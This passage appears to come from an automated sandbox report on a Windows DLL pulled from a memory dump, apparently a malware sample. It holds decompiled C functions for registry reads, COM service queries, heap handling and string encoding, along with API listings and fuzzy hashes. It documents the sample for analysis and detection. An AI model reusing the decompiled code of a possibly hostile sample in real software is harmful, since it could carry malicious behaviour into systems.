                                								_v8 = _v8 & 0x00000000;
                                							}
                                							RegCloseKey(_v12);
                                						}
                                						E046150CA(_t34);
                                					}
                                					E046150CA(_t31);
                                				}
                                				return _v8;
                                			}

                                APIs
                                  • Part of subcall function 04613875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,046171C8,004F0053,00000000,?), ref: 0461387E
                                  • Part of subcall function 04613875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,046171C8,004F0053,00000000,?), ref: 046138A8
                                  • Part of subcall function 04613875: memset.NTDLL ref: 046138BC
                                • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 046171F7
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 04617213
                                • RegCloseKey.ADVAPI32(00000000), ref: 04617224
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                • String ID:
                                • API String ID: 830012212-0
                                • Opcode ID: 7e99f40a4ca58c458b007dbd4b0f8beea289478738b9dd77c1f3cdaabd8afa94
                                • Instruction ID: c8095c6c33cfe75195df77d449dc96a0813676ac01fc9b1b191535ee63190c7f
                                • Opcode Fuzzy Hash: 7e99f40a4ca58c458b007dbd4b0f8beea289478738b9dd77c1f3cdaabd8afa94
                                • Instruction Fuzzy Hash: BF111272600209FBEB11DBD4DC84FAE77BCEB44705F18005AB501E7161F774EA059B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0461181D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                				int _v12;
                                				signed int _v16;
                                				void* _v20;
                                				signed char _v36;
                                				void* _t24;
                                				intOrPtr _t27;
                                				void* _t35;
                                				signed int _t38;
                                				signed char* _t46;
                                				int _t53;
                                				void* _t55;
                                				void* _t56;
                                				void* _t57;
                                
                                				_v16 = _v16 & 0x00000000;
                                				_t46 = _a4;
                                				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                                				_v12 = 0x110;
                                				_t24 = E04616837(_t53);
                                				_a4 = _t24;
                                				if(_t24 != 0) {
                                					memcpy(_t24,  *0x461a324, 0x110);
                                					_t27 =  *0x461a328; // 0x0
                                					_t57 = _t56 + 0xc;
                                					if(_t27 != 0) {
                                						_t51 = _a4;
                                						E04615F68(0x110, _a4, _t27, 0);
                                					}
                                					if(E04612BB0( &_v36) != 0) {
                                						_t35 = E046139C5(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                                						if(_t35 == 0) {
                                							_t55 = _v20;
                                							_v36 =  *_t46;
                                							_t38 = E04612BE3(_t55, _a8, _t51, _t46, _a12); // executed
                                							_v16 = _t38;
                                							 *(_t55 + 4) = _v36;
                                							_t20 =  &(_t46[4]); // 0x8b4875fc
                                							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                                							_t57 = _t57 + 0xc;
                                							E046150CA(_t55);
                                						}
                                					}
                                					memset(_a4, 0, _t53);
                                					E046150CA(_a4);
                                				}
                                				return _v16;
                                			}

                                APIs
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • memcpy.NTDLL(00000000,00000110,046120FA,046120FA,?,?,046120FA,?,?,04616042,?), ref: 04611853
                                • memset.NTDLL ref: 046118C8
                                • memset.NTDLL ref: 046118DC
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memset$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 1529149438-0
                                • Opcode ID: 239a10274dba3bf4ea3857e3f4de451108187988fe21498e1bccb0fd6fe47ed0
                                • Instruction ID: 1bb40cbdfcc970f2b2fb392c28f640c3e29f583815b2b9d3c577fc5f04354e0f
                                • Opcode Fuzzy Hash: 239a10274dba3bf4ea3857e3f4de451108187988fe21498e1bccb0fd6fe47ed0
                                • Instruction Fuzzy Hash: 5E213075A00218BBEF11AFA5CC40FEEBBB8AF49244F084059F904E6260F774E6408BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 38%
                                			E04611206(intOrPtr _a4) {
                                				void* _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				void* _v28;
                                				char _v32;
                                				intOrPtr _v40;
                                				void* _v46;
                                				short _v48;
                                				intOrPtr _t49;
                                				void* _t51;
                                				intOrPtr* _t53;
                                				intOrPtr _t56;
                                				void* _t58;
                                				intOrPtr* _t59;
                                				intOrPtr* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				intOrPtr* _t67;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr* _t73;
                                				intOrPtr _t76;
                                				intOrPtr* _t79;
                                				short _t81;
                                				char* _t97;
                                				intOrPtr _t99;
                                				void* _t105;
                                				void* _t107;
                                				intOrPtr _t111;
                                
                                				_t81 = 0;
                                				_v48 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t49 =  *0x461a2d4; // 0xdad5a8
                                				_t4 = _t49 + 0x461b418; // 0x53c89c0
                                				_t5 = _t49 + 0x461b408; // 0x9ba05972
                                				_t51 =  *0x461a140(_t5, 0, 4, _t4,  &_v20); // executed
                                				_t105 = _t51;
                                				if(_t105 >= 0) {
                                					_t53 = _v20;
                                					_push( &_v12);
                                					_push(1);
                                					_push( &_v32);
                                					_push(8);
                                					_t97 =  &_v48;
                                					_push(_t97);
                                					_push(_t97);
                                					_push(_t53); // executed
                                					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                						_t56 =  *0x461a2d4; // 0xdad5a8
                                						_t30 = _t56 + 0x461b3f8; // 0x53c89a0
                                						_t31 = _t56 + 0x461b428; // 0x4c96be40
                                						_t58 =  *0x461a114(_v12, _t31, _t30,  &_v24); // executed
                                						_t105 = _t58;
                                						_t59 = _v12;
                                						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                						goto L11;
                                					} else {
                                						_t71 = _v20;
                                						_v16 = 0;
                                						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                						if(_t105 >= 0) {
                                							_t111 = _v16;
                                							if(_t111 == 0) {
                                								_t105 = 0x80004005;
                                								goto L11;
                                							} else {
                                								if(_t111 <= 0) {
                                									L11:
                                									if(_t105 >= 0) {
                                										goto L12;
                                									}
                                								} else {
                                									do {
                                										_t73 = _v20;
                                										_v48 = 3;
                                										_v40 = _t81;
                                										_t107 = _t107 - 0x10;
                                										asm("movsd");
                                										asm("movsd");
                                										asm("movsd");
                                										asm("movsd");
                                										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                                										if(_t105 < 0) {
                                											goto L7;
                                										} else {
                                											_t76 =  *0x461a2d4; // 0xdad5a8
                                											_t23 = _t76 + 0x461b3f8; // 0x53c89a0
                                											_t24 = _t76 + 0x461b428; // 0x4c96be40
                                											_t105 =  *0x461a114(_v12, _t24, _t23,  &_v24);
                                											_t79 = _v12;
                                											 *((intOrPtr*)( *_t79 + 8))(_t79);
                                											if(_t105 >= 0) {
                                												L12:
                                												_t63 = _v24;
                                												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                												if(_t105 >= 0) {
                                													_t99 =  *0x461a2d4; // 0xdad5a8
                                													_t67 = _v28;
                                													_t40 = _t99 + 0x461b3e8; // 0x214e3
                                													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                													_t69 = _v28;
                                													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                												}
                                												_t65 = _v24;
                                												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                											} else {
                                												goto L7;
                                											}
                                										}
                                										goto L15;
                                										L7:
                                										_t81 = _t81 + 1;
                                									} while (_t81 < _v16);
                                									goto L11;
                                								}
                                							}
                                						}
                                					}
                                					L15:
                                					_t61 = _v20;
                                					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                				}
                                				return _t105;
                                			}

                                APIs
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053C89A0,04612932,?,?,?,?,?,?,?,?,?,?,?,04612932), ref: 046112D2
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053C89A0,04612932,?,?,?,?,?,?,?,04612932,00000000,00000000,00000000,006D0063), ref: 04611310
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: QueryServiceUnknown_
                                • String ID:
                                • API String ID: 2042360610-0
                                • Opcode ID: cc85ba4424f65698641b0ace7e217568e89ab252049f7986bb19481689a68286
                                • Instruction ID: 6e85ac8cdf79bde37bb7df6e4b67a0a4e20f009399ad5bbbfe7ceaf1dcb6089b
                                • Opcode Fuzzy Hash: cc85ba4424f65698641b0ace7e217568e89ab252049f7986bb19481689a68286
                                • Instruction Fuzzy Hash: 2A510E75900219AFCB00DFE8C884DEEB7B9FF4D710B098559EA15EB221E635AD45CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E04616872(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                				void* _v8;
                                				void* __esi;
                                				intOrPtr* _t35;
                                				void* _t40;
                                				intOrPtr* _t41;
                                				intOrPtr* _t43;
                                				intOrPtr* _t45;
                                				intOrPtr* _t50;
                                				intOrPtr* _t52;
                                				void* _t54;
                                				intOrPtr* _t55;
                                				intOrPtr* _t57;
                                				intOrPtr* _t61;
                                				intOrPtr* _t65;
                                				intOrPtr _t68;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                
                                				_t55 = _a4;
                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                				_a4 = 0;
                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                				if(_t76 < 0) {
                                					L18:
                                					return _t76;
                                				}
                                				_t40 = E04615C35(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                				_t76 = _t40;
                                				if(_t76 >= 0) {
                                					_t61 = _a28;
                                					if(_t61 != 0 &&  *_t61 != 0) {
                                						_t52 = _v8;
                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                					}
                                					if(_t76 >= 0) {
                                						_t43 =  *_t55;
                                						_t68 =  *0x461a2d4; // 0xdad5a8
                                						_t20 = _t68 + 0x461b1fc; // 0x740053
                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                						if(_t76 >= 0) {
                                							_t76 = E046137AF(_a4);
                                							if(_t76 >= 0) {
                                								_t65 = _a28;
                                								if(_t65 != 0 &&  *_t65 == 0) {
                                									_t50 = _a4;
                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                								}
                                							}
                                						}
                                						_t45 = _a4;
                                						if(_t45 != 0) {
                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                						}
                                						_t57 = __imp__#6;
                                						if(_a20 != 0) {
                                							 *_t57(_a20);
                                						}
                                						if(_a12 != 0) {
                                							 *_t57(_a12);
                                						}
                                					}
                                				}
                                				_t41 = _v8;
                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                				goto L18;
                                			}

                                APIs
                                  • Part of subcall function 04615C35: SysAllocString.OLEAUT32(80000002), ref: 04615C8C
                                  • Part of subcall function 04615C35: SysFreeString.OLEAUT32(00000000), ref: 04615CF1
                                • SysFreeString.OLEAUT32(?), ref: 04616951
                                • SysFreeString.OLEAUT32(04611E05), ref: 0461695B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 277c197456a1b8108afc7d9d74157edbc94fb639fb28d6e16cd7462c279ba708
                                • Instruction ID: c1195bd2986af83562b2f87d1a1a429b7a3d3f285d07a45e582999fd17ec4144
                                • Opcode Fuzzy Hash: 277c197456a1b8108afc7d9d74157edbc94fb639fb28d6e16cd7462c279ba708
                                • Instruction Fuzzy Hash: 0B314B7650011AEFCB21DF64C988C9BBBB9FFC97407184A59F8199B220E331ED51CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E046143C0(intOrPtr* __eax, intOrPtr _a4) {
                                				void* _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr* _t22;
                                				void* _t23;
                                				intOrPtr* _t24;
                                				intOrPtr* _t26;
                                				intOrPtr* _t28;
                                				intOrPtr* _t30;
                                				void* _t31;
                                				intOrPtr* _t32;
                                				intOrPtr _t42;
                                				intOrPtr _t45;
                                				intOrPtr _t48;
                                				void* _t51;
                                
                                				_push( &_v16);
                                				_t42 =  *0x461a2d4; // 0xdad5a8
                                				_t2 = _t42 + 0x461b438; // 0x20400
                                				_push(0);
                                				_push(__eax);
                                				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                				if(_t51 >= 0) {
                                					_t22 = _v16;
                                					_t45 =  *0x461a2d4; // 0xdad5a8
                                					_t6 = _t45 + 0x461b458; // 0xe7a1af80
                                					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                					_t51 = _t23;
                                					if(_t51 >= 0) {
                                						_t26 = _v12;
                                						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                						if(_t51 >= 0) {
                                							_t48 =  *0x461a2d4; // 0xdad5a8
                                							_t30 = _v8;
                                							_t12 = _t48 + 0x461b448; // 0xa4c6892c
                                							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                							_t51 = _t31;
                                							_t32 = _v8;
                                							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                						}
                                						_t28 = _v12;
                                						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                					}
                                					_t24 = _v16;
                                					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                				}
                                				return _t51;
                                			}

                                APIs
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 046143FD
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 0461442E
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Interface_ProxyQueryUnknown_
                                • String ID:
                                • API String ID: 2522245112-0
                                • Opcode ID: 13d0180fad9f830ef5a0681d5ecf9976d0b70165d53c1cfa290eb7953d90c417
                                • Instruction ID: e7495871956ca487ec6016de15d01e6b9418b35973cfffd4a77659fbbb6198db
                                • Opcode Fuzzy Hash: 13d0180fad9f830ef5a0681d5ecf9976d0b70165d53c1cfa290eb7953d90c417
                                • Instruction Fuzzy Hash: 5B211275A00619EFCB00DFA4C444D9AB779EFC9704B188698E905DB325EA35ED41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04612F08
                                  • Part of subcall function 04616872: SysFreeString.OLEAUT32(?), ref: 04616951
                                • SafeArrayDestroy.OLEAUT32(?), ref: 04612F55
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ArraySafe$CreateDestroyFreeString
                                • String ID:
                                • API String ID: 3098518882-0
                                • Opcode ID: b9ed8df902ec17a6c1e37ad0dcd2fe46c9fe61a8e3c63372b71caf52850bdf94
                                • Instruction ID: e450c931595bc5fb43a8c9f6a53c64e13466bcbfff4b11a1ffde5462f712626c
                                • Opcode Fuzzy Hash: b9ed8df902ec17a6c1e37ad0dcd2fe46c9fe61a8e3c63372b71caf52850bdf94
                                • Instruction Fuzzy Hash: 47115272A00109BFDB01DFA8CC44ADEB7B8EF04710F098065FA14E6171E375AA15DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E046174B6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                				struct _FILETIME _v12;
                                				signed int _t11;
                                				void* _t15;
                                				void* _t20;
                                				void* _t22;
                                				void* _t23;
                                				signed short* _t24;
                                
                                				_t22 = __edx;
                                				_t23 = E04614AA6(_t11, _a12);
                                				if(_t23 == 0) {
                                					_t20 = 8;
                                				} else {
                                					_t24 = _t23 + _a16 * 2;
                                					 *_t24 =  *_t24 & 0x00000000; // executed
                                					_t15 = E04616304(__ecx, _a4, _a8, _t23); // executed
                                					_t20 = _t15;
                                					if(_t20 == 0) {
                                						GetSystemTimeAsFileTime( &_v12);
                                						 *_t24 = 0x5f;
                                						_t20 = E04615F2A(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                                					}
                                					HeapFree( *0x461a290, 0, _t23);
                                				}
                                				return _t20;
                                			}











                                APIs
                                  • Part of subcall function 04614AA6: lstrlen.KERNEL32(?,00000000,053C9C98,74ECC740,046113D0,053C9E9D,046155DE,046155DE,?,046155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04614AAD
                                  • Part of subcall function 04614AA6: mbstowcs.NTDLL ref: 04614AD6
                                  • Part of subcall function 04614AA6: memset.NTDLL ref: 04614AE8
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,75145520,00000008,00000014,004F0053,053C92FC), ref: 046174ED
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,75145520,00000008,00000014,004F0053,053C92FC), ref: 0461751A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID:
                                • API String ID: 1500278894-0
                                • Opcode ID: 5d1b54a0a028bcc437201b72944bdc34205fa5b1e1e41493044deac3094968cd
                                • Instruction ID: a793b5c2527f65f4652528645baa50cd1f09a44346be7bb895f7dfd32680270f
                                • Opcode Fuzzy Hash: 5d1b54a0a028bcc437201b72944bdc34205fa5b1e1e41493044deac3094968cd
                                • Instruction Fuzzy Hash: BC01AD32200209BBEB216FA4DC44E9A7BB9FF84715F144029FA4596170FBB1ED29CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(04614106), ref: 046117CA
                                  • Part of subcall function 04616872: SysFreeString.OLEAUT32(?), ref: 04616951
                                • SysFreeString.OLEAUT32(00000000), ref: 0461180A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: e920ea61807905bff53d71d8f4fd07a365c3dcb85c31816f1b94a0f5a462fc2c
                                • Instruction ID: 236dc0a7240eca176e7200b055a0e806099d0557a24a8760bd0d1d6b4d875460
                                • Opcode Fuzzy Hash: e920ea61807905bff53d71d8f4fd07a365c3dcb85c31816f1b94a0f5a462fc2c
                                • Instruction Fuzzy Hash: CF014F7661110ABFDB519F68D80899F7BB9EF48710B088025FA05A6230F774ED19DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _t4;
                                				void* _t10;
                                				signed int _t11;
                                				void* _t13;
                                
                                				_t13 = 1;
                                				_t4 = _a8;
                                				if(_t4 == 0) {
                                					if(InterlockedDecrement(0x461a294) == 0) {
                                						E04615076();
                                					}
                                				} else {
                                					if(_t4 == 1 && InterlockedIncrement(0x461a294) == 1) {
                                						_t10 = E04616B0F(_t11, _a4); // executed
                                						if(_t10 != 0) {
                                							_t13 = 0;
                                						}
                                					}
                                				}
                                				return _t13;
                                			}








                                APIs
                                • InterlockedIncrement.KERNEL32(0461A294), ref: 0461569A
                                  • Part of subcall function 04616B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04616B24
                                • InterlockedDecrement.KERNEL32(0461A294), ref: 046156BA
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 862e79c8ced2afd5ca1a0c4cc3851a81f4323c75486a36c2f152ac63c1aa8fe6
                                • Instruction ID: e028ebd8514c4db31998a635f0a9cd12e2cad8349080ea0ca1da067bb18e5321
                                • Opcode Fuzzy Hash: 862e79c8ced2afd5ca1a0c4cc3851a81f4323c75486a36c2f152ac63c1aa8fe6
                                • Instruction Fuzzy Hash: D9E04F39304332779B226EA49908B9EE650ABA1BC5B0C8418B483D1138F714F850C6E5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 92%
                                			E04616176(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                				signed int _v5;
                                				signed int _v12;
                                				void* _t32;
                                				signed int _t37;
                                				signed int _t39;
                                				signed char _t45;
                                				void* _t49;
                                				char* _t51;
                                				signed int _t65;
                                				signed int _t66;
                                				signed int _t69;
                                
                                				_v12 = _v12 & 0x00000000;
                                				_t69 = __eax;
                                				_t32 = RtlAllocateHeap( *0x461a290, 0, __eax << 2); // executed
                                				_t49 = _t32;
                                				if(_t49 == 0) {
                                					_v12 = 8;
                                				} else {
                                					 *_a8 = _t49;
                                					do {
                                						_t45 =  *_a4;
                                						asm("cdq");
                                						_t65 = 0x64;
                                						_t37 = (_t45 & 0x000000ff) / _t65;
                                						_v5 = _t37;
                                						if(_t37 != 0) {
                                							 *_t49 = _t37 + 0x30;
                                							_t49 = _t49 + 1;
                                							_t45 = _t45 + _t37 * 0x9c;
                                						}
                                						asm("cdq");
                                						_t66 = 0xa;
                                						_t39 = (_t45 & 0x000000ff) / _t66;
                                						if(_t39 != 0 || _v5 != _t39) {
                                							 *_t49 = _t39 + 0x30;
                                							_t49 = _t49 + 1;
                                							_t45 = _t45 + _t39 * 0xf6;
                                						}
                                						_a4 = _a4 + 1;
                                						 *_t49 = _t45 + 0x30;
                                						 *(_t49 + 1) = 0x2c;
                                						_t49 = _t49 + 2;
                                						_t69 = _t69 - 1;
                                					} while (_t69 != 0);
                                					_t51 = _t49 - 1;
                                					 *_a12 = _t51 -  *_a8;
                                					 *_t51 = 0;
                                				}
                                				return _v12;
                                			}















                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0461618E
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 4a59fa65a83504c62bde7dd1511e6e8b0d0891ba6e23bc74eaaf54d6895c858a
                                • Instruction ID: 18d413103840073714e86cd40bcdcb7d91ea4c99baf5640a5992fbca5017fe82
                                • Opcode Fuzzy Hash: 4a59fa65a83504c62bde7dd1511e6e8b0d0891ba6e23bc74eaaf54d6895c858a
                                • Instruction Fuzzy Hash: 2A11E9752863449FEB068F2DD852BE97BA5DB63358F18508EE4408B3A3D27B950BC760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E04614576(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                				intOrPtr _v12;
                                				void* _v18;
                                				short _v20;
                                				intOrPtr _t15;
                                				short _t17;
                                				intOrPtr _t19;
                                				short _t23;
                                
                                				_t23 = 0;
                                				_v20 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t15 =  *0x461a2d4; // 0xdad5a8
                                				_t4 = _t15 + 0x461b390; // 0x53c8938
                                				_t20 = _t4;
                                				_t6 = _t15 + 0x461b124; // 0x650047
                                				_t17 = E04616872(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                				if(_t17 < 0) {
                                					_t23 = _t17;
                                				} else {
                                					if(_v20 != 8) {
                                						_t23 = 1;
                                					} else {
                                						_t19 = E04613875(_t20, _v12);
                                						if(_t19 == 0) {
                                							_t23 = 8;
                                						} else {
                                							 *_a16 = _t19;
                                						}
                                						__imp__#6(_v12);
                                					}
                                				}
                                				return _t23;
                                			}











                                APIs
                                  • Part of subcall function 04616872: SysFreeString.OLEAUT32(?), ref: 04616951
                                  • Part of subcall function 04613875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,046171C8,004F0053,00000000,?), ref: 0461387E
                                  • Part of subcall function 04613875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,046171C8,004F0053,00000000,?), ref: 046138A8
                                  • Part of subcall function 04613875: memset.NTDLL ref: 046138BC
                                • SysFreeString.OLEAUT32(00000000), ref: 046145DC
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: a0a4f95373800f451e7b551cb710f8c6f9150f85b135504149898c5dd4c003e0
                                • Instruction ID: 055ee48b97c6a9e3a443230d0332a3ba6edc08542ae4f6b914f922b9f29b441b
                                • Opcode Fuzzy Hash: a0a4f95373800f451e7b551cb710f8c6f9150f85b135504149898c5dd4c003e0
